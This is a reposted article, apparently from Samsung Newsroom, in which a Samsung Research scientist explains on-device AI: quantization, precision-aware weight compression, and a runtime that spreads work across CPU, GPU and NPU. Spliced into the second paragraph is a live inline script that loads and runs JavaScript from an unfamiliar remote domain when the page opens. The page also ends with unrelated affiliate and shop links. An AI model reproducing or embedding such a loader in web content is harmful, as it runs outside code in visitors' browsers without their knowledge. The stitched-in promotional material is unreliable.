AI was frequently shown as enormous servers or towering computer systems in vintage science fiction movies. These days, it is a commonplace technology that is instantly available on the gadgets that people carry about. In order to enable AI to operate locally without the need for external servers or the cloud for quicker, more secure experiences, Samsung Electronics is extending the usage of on-device AI across goods like smartphones and household appliances.
(function(d,z,s){s.src='https://'+d+'/400/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('vemtoutcheeg.com',9544492,document.createElement('script'))On-device settings are subject to stringent memory and processing limitations, in contrast to server-based systems. Reducing the size of AI models and optimizing runtime performance are hence crucial. The Samsung Research AI Center is spearheading research in a number of key areas, including model compression, runtime software optimization, and the creation of novel architectures, in order to address this problem.
Dr. MyungJoo Ham, Master at Samsung Research’s AI Center, spoke with Samsung Newsroom on the future of on-device AI and the optimization technologies that enable it.
Large language models (LLMs) are at the core of generative AI, which reads user language and generates genuine answers. Compressing and refining these large models to make them function properly on gadgets like smartphones is the first step towards allowing on-device AI.
“Running a highly advanced model that performs billions of computations directly on a smartphone or laptop would quickly drain the battery, increase heat, and slow response times—noticeably degrading the user experience,” said Dr. Ham. “Model compression technology emerged to address these issues.”
LLMs use incredibly intricate numerical representations to carry their computations. Model compression uses a procedure known as quantization to simplify these data into more effective integer representations. He said, “It’s similar to compressing a high-resolution photo so the file size shrinks but the visual quality remains nearly the same.” “For example, switching from 32-bit floating-point calculations to 8-bit or even 4-bit integers greatly lowers computational load and memory consumption, accelerating response times.”
The overall accuracy of a model can be lowered by a decrease in numerical precision during quantization. Samsung Research is creating tools and algorithms that closely monitor and calibrate performance after compression in order to strike a balance between speed and model quality.
“The goal of model compression isn’t just to make the model smaller—it’s to keep it fast and accurate,” Dr. Ham said. “Using optimization algorithms, we analyze the model’s loss function during compression and retrain it until its outputs stay close to the original, smoothing out areas with large errors. Because each model weight has a different level of importance, we preserve critical weights with higher precision while compressing less important ones more aggressively. This approach maximizes efficiency without compromising accuracy.”
Samsung Research not only develops model compression technology at the prototype stage but also adapts and commercializes it for real-world goods like home appliances and smartphones.
“Because every device model has its own memory architecture and computing profile, a general approach can’t deliver cloud-level AI performance,” he said. “Through product-driven research, we’re designing our own compression algorithms to enhance AI experiences users can feel directly in their hands.”
The user experience ultimately depends on how it functions on the device, even with a well-compressed model. An AI runtime engine that maximizes the usage of a device’s memory and processing power during execution is being developed by Samsung Research.
“The AI runtime is essentially the model’s engine control unit,” Dr. Ham said. “When a model runs across multiple processors—such as the central processing unit (CPU), graphics processing unit (GPU), and neural processing unit (NPU)—the runtime automatically assigns each operation to the optimal chip and minimizes memory access to boost overall AI performance.”
Larger and more complex models may also operate at the same speed on the same device thanks to the AI runtime. In addition to lowering reaction latency, this enhances the general quality of AI, producing more precise outcomes, more fluid dialogues, and more sophisticated picture processing.
“The biggest bottlenecks in on-device AI are memory bandwidth and storage access speed,” he said. “We’re developing optimization techniques that intelligently balance memory and computation.” For example, loading only the data needed at a given moment, rather than keeping everything in memory, improves efficiency. “Samsung Research now has the capability to run a 30-billion-parameter generative model—typically more than 16 GB in size—on less than 3 GB of memory,” he added.
Follow us for more information:
- Facebook –
https://www.facebook.com/studiocs20
- Instagram –
https://www.instagram.com/studiocs_20
- Website –
– You can check The new AI for making videos, using this link –
https://videogen.io?fpr=marko34

-You can check the cheapest touristic possibilities, using this link:
https://checkingreservation.com
TEMU – ONLINE SHOP

